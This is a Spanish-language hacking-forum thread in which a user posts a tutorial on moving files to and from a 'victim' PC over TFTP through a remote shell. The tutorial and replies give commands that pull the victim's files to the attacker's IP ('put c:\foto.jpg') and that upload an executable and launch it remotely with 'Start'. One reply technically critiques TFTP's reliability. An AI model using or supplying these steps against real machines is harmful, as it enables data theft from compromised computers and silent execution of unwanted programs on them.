Subir Archivos a una victima por un servidor TFTP by fNiX

[fNiX]

Subir Archivos a una victima por un servidor TFTP

Herramientas Necesarias:
1-
Para ver este enlace Registrate o Inicia Sesion

Un Servidor TFTP

2-Tener una Shell Remota en el Pc de la Victima

Hola a todos,Como veo que esto no ha sido posteado en el foro me veo en la obligacion de postearlo =D
Como TFTP no necesita Autentificacio n es muy rapido trabajar con el =P

Bueno para los que no Saben lo que es TFTP aqui pueden saber lo que es

Para ver este enlace Registrate o Inicia Sesion

http://es.wikipedia.org/wiki/TFTP

<-- texto corto y simple pero ayuda

Bueno teniendo claro lo que es el protocolo TFTP Explicare como subir Archivos o Descargar Archivos de una Vicitma por medio de este mismo =P

1-Configurandolo
Bueno yo en este caso Ocupare un servidor TFTP llamado SolarWinds
el cual pueden descargar de aqui -->
Para ver este enlace Registrate o Inicia Sesion

www.solarwinds .net

Luego de que lo descargamos lo debemos de instalar.
al momento de ejecutarlo puede que nos salga el firewall
debemos de hacer clic en "desbloquear" ¿por que?
bueno para que no nos joda el Firewall Todo el rato.

Una Vez que lo ejecutamos nos saldra una Imagen como esta:


Podemos Ver en la configuracion que la carpeta C:\TFTP-Root
sera la carpeta en la cual apareceran los archivos que le
subamos a nuestra victima y los que descargaremos de ella.

Es Muy importante que no cerremos esta ventana
ya que se nos cerrara nuestro servidor TFTP.

Obiamente para poder subir o bajar algun archivo
necesitamos Obtener Una Shell Remota, para los que no saben.
solo necesitan buscar
Para ver este enlace Registrate o Inicia Sesion

aqui

2-Subir Archivo
Bien para que se entienda lo pondre de esta manera:
Ip de ustedes = 123.123.123.12 3
Ip de Victima = 44.44.44.44
Primero que todo debemos de poner el archivo que queremos mandar en la carpeta TFTP-Root, y luego de eso nos vamos a nuestra Shell Remota y escribimos:

C:\tftp –i 123.123.123.12 3 get Fotodeejemplo. jpg c:\Windows

Explicacion del codigo:
Bueno primeramente necesitamos saber los controles de TFTP:

Bueno basicamente colocamos nuestro archivo en este caso
"fotodeejemplo. jpg" en la carpeta windows de nuestra victima.

1-Bajar Archivo
Bueno si Hipoteticament e nuestra victima tiene un archivo por ejemplo:
C:\foto.jpg y nosotros queremos tener esa foto.
Sencillamente vamos a nuestra Shell Remota y Escribimos

tftp –i 123.123.123.12 3 put c:\foto.jpg foto.jpg

Explicacion del Codigo:
Primero debemos saber en que consta el comando "Put"

Basicamente el archivo se transfiere a nosotros ^^

Bueno eso ha sido todo por hoy =P
espero que les guste a todos ^^
Cualquier duda pregunten

Salu2!

[Xcross]

muy bueno el manual, gracias por el aporte, recuerda que no se puede poner la palabra "victima" saludos

[noipssh]

una pregunta... esto tambien sirve para shells en linux ??

saludos...

[fNiX]

muy bueno el manual, gracias por el aporte, recuerda que no se puede poner la palabra "victima" saludos

Revise las relgas del foro "Hacking"
y no dice que no se pueda decir "victima" ^^

una pregunta... esto tambien sirve para shells en linux ??

saludos...

mira la verdad no lo sé
no me manejo en linux xD

[Xcross]

una pregunta... esto tambien sirve para shells en linux ??

saludos...

creo que si, pero no estoy muy seguro

[fNiX]

creo que si, pero no estoy muy seguro

ya he aberiguado y si es posible
solo que los comandos de la shell remota son distintos =D

Salu2!

[KilerSys]

Buen tuto fNiX

[FreaK]

muy buen tuto fnix, es muy interesante el tema

[carlmycol]

Muy fNIX se ve bastante interesante, habia oido muy poco de ese protocolo

salu2

[fNiX]

Muy fNIX se ve bastante interesante, habia oido muy poco de ese protocolo

salu2

cabe decir amigo carlmycol
que TFTP es mas rapidop y estable a FTP =D
por eso yo lo recomiendo al 100%

aunque FTP nos puede ser bastante util =D

[VI-01]

Muy buen manual ... dime podria subir un instalador? y que se instale en la pc?  teniendo una shell ?? saludos y gracias 

[fNiX]

Muy buen manual ... dime podria subir un instalador? y que se instale en la pc?  teniendo una shell ?? saludos y gracias 

si amigo y muchas cosas mas....

incluso puedes usar TFTP sin shell =D


Para ver este enlace Registrate o Inicia Sesion

Usando TFTP sin Shell Remota (Troyanizando,Bloquear Paginas Web) by fNiX  (Leído 44 veces)

[vengador de las sombras]

cabe decir amigo carlmycol
que TFTP es mas rapidop y estable a FTP =D
por eso yo lo recomiendo al 100%

aunque FTP nos puede ser bastante util =D

Discrepo...


Para empezar TFTP es menos estable a FTP porque como protocolo de transferencia UDP en vez de usar TCP. ¿Qué quiero decir con esto? Pues que a diferencia del protocolo TCP, no garantiza ni la entrega ni la ausencia de duplicados.

A parte, no permite listar el contenido de los directorios, y lo que más me preocupa (a parte de que los paquetes de transferencia pueden llegar mal o no llegar directamente) es que no se le pueda aplicar ningún tipo de cifrado, con lo cual estamos hablando de una gran inseguridad.

TFTP estaba pensado en sus inicios para mandar archivos pequeños entre ordenadores de una LAN... es por eso que no está preparado para usarse al mismo nivel que utilizamos hoy en día FTP. No hay ni punto de comparación entre FTP y TFTP  :

[VI-01]

si amigo y muchas cosas mas....

incluso puedes usar TFTP sin shell =D


Para ver este enlace Registrate o Inicia Sesion

Usando TFTP sin Shell Remota (Troyanizando,Bloquear Paginas Web) by fNiX  (Leído 44 veces)

Ola osea por ejemplo le subo el instalador de un juego ... y por cmd podria ejecutarlo asi : juego.exe y lo instalaria reomotamente???

saludos

[fNiX]

Ola osea por ejemplo le subo el instalador de un juego ... y por cmd podria ejecutarlo asi : juego.exe y lo instalaria reomotamente???

Exacto, si deseas subir el instalador y ejecutarlo lo podrias hacer de esta manera:

1º Subes el instalador

C:\tftp –i [tu IP] get instaladorjueg o.exe c:\Windows

2º Desde la Shell Remota ejecutas el instalador

Start c:\windows\Instaladorjuego.exe

El problema...
a la persona le aparecera la imagen de el instalador
pero si la persona quiere puede evitar la descarga
entiendes a lo que me refiero?
cuando instalas un programa te aparece la pantalla de instalacion
pero si tu quieres puede poner "cancelar" y no se instala
ese seria el unico problema...

Salu2! 

[VI-01]

Ok amigo si t entendi .... y si es un ejecutable .exe nomas q no necesita de instalarse osea la pantallita esa de siguiente ....   hay si podria? saludos

[fNiX]

Ok amigo si t entendi .... y si es un ejecutable .exe nomas q no necesita de instalarse osea la pantallita esa de siguiente ....   hay si podria? saludos

porsupuesto que podrias men

Salu2! 

[VI-01]

Utiliza UDP (puerto 69) como protocolo de transporte (a diferencia de FTP que utiliza el puerto 21 TCP).

Hola tendriamos q brir el puerto 69 no es asi ?

[fNiX]

Utiliza UDP (puerto 69) como protocolo de transporte (a diferencia de FTP que utiliza el puerto 21 TCP).

Hola tendriamos q brir el puerto 69 no es asi ?

Yo en lo personal yo no he abierto ningun puerto y sin embargo me funciona a la perfeccion aunque si quieres abrirlo no veo cual seria el drama

Salu2!